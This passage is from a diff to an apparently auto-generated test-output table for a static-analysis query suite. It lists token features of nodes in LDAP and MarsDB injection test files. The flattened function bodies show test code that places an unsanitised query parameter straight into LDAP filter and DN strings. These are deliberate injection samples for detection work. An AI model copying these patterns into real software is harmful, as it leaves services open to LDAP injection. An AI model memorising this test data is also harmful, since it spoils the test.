autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:71:66:73 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:71:66:73 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:71:66:73 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:66:71:66:73 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:10 | dn | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:10 | dn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:10 | dn | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:10 | dn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:10 | dn | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:66 | dn = ld ... dn) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:66 | dn = ld ... dn) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:66 | dn = ld ... dn) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:66 | dn = ld ... dn) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:9:68:66 | dn = ld ... dn) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:17 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:17 | ldap | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:17 | ldap | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:17 | ldap | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:17 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:25 | ldap.parseDN | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:25 | ldap.parseDN | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:25 | ldap.parseDN | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:25 | ldap.parseDN | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:25 | ldap.parseDN | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | exceptional return of ldap.pa ... dn) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | exceptional return of ldap.pa ... dn) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | exceptional return of ldap.pa ... dn) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | exceptional return of ldap.pa ... dn) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | exceptional return of ldap.pa ... dn) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | ldap.pa ... dn) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | ldap.pa ... dn) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | ldap.pa ... dn) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | ldap.pa ... dn) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:14:68:66 | ldap.pa ... dn) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:19:68:25 | parseDN | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:19:68:25 | parseDN | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:19:68:25 | parseDN | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:19:68:25 | parseDN | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:19:68:25 | parseDN | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | CalleeFlexibleAccessPath | ldap.parseDN | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | calleeImports | ldapjs | @@ -1183,6 +6380,33 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:27:68:42 | `cn=${username}` | receiverName | ldap | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:28:68:30 | cn= | stringConcatenatedWith | -endpoint- username | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:33:68:40 | username | stringConcatenatedWith | 'cn=' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:44 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:44 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:44 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:44 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:44 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | CalleeFlexibleAccessPath | ldap.parseDN | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | calleeImports | ldapjs | @@ -1192,6 +6416,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | functio ... dn) {} | receiverName | ldap | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:45:68:65 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:55:68:57 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:55:68:57 | err | contextSurroundingFunctionParameters | (req, res)\n(err, dn) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:55:68:57 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:55:68:57 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:55:68:57 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:60:68:61 | dn | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:60:68:61 | dn | contextSurroundingFunctionParameters | (req, res)\n(err, dn) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:60:68:61 | dn | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:60:68:61 | dn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:68:60:68:61 | dn | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:6 | server | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:6 | server | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:6 | server | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:13 | server.listen | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:13 | server.listen | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:13 | server.listen | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | exceptional return of server. ... => {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | exceptional return of server. ... => {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | exceptional return of server. ... => {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | server. ... => {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | server. ... => {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:1:71:28 | server. ... => {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:8:71:13 | listen | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:8:71:13 | listen | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:8:71:13 | listen | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | CalleeFlexibleAccessPath | server.listen | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | calleeImports | http | @@ -1199,6 +6453,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:15:71:17 | 389 | receiverName | server | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | 'arguments' object of anonymous function | enclosingFunctionName | server.listen#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | 'arguments' object of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | CalleeFlexibleAccessPath | server.listen | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | calleeImports | http | @@ -1206,30 +6464,239 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | contextSurroundingFunctionParameters | () | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | () => {} | receiverName | server | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | exceptional return of anonymous function | enclosingFunctionName | server.listen#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | exceptional return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | return of anonymous function | enclosingFunctionName | server.listen#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:71:20:71:27 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:0 | this | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | module | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | module | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:1:1:1 | require | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:12 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:12 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:12 | MarsDB | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB ... arsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB ... arsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:7:1:32 | MarsDB ... arsdb") | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:22 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:22 | require | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | exceptional return of require("marsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | exceptional return of require("marsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | exceptional return of require("marsdb") | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | require("marsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | require("marsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:16:1:32 | require("marsdb") | fileImports | marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:1:24:1:31 | "marsdb" | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:11 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:11 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:11 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc = ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc = ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:7:3:44 | myDoc = ... myDoc") | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | exceptional return of new Mar ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | exceptional return of new Mar ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | exceptional return of new Mar ... myDoc") | fileImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb-flow-from.js:3:15:3:44 | new 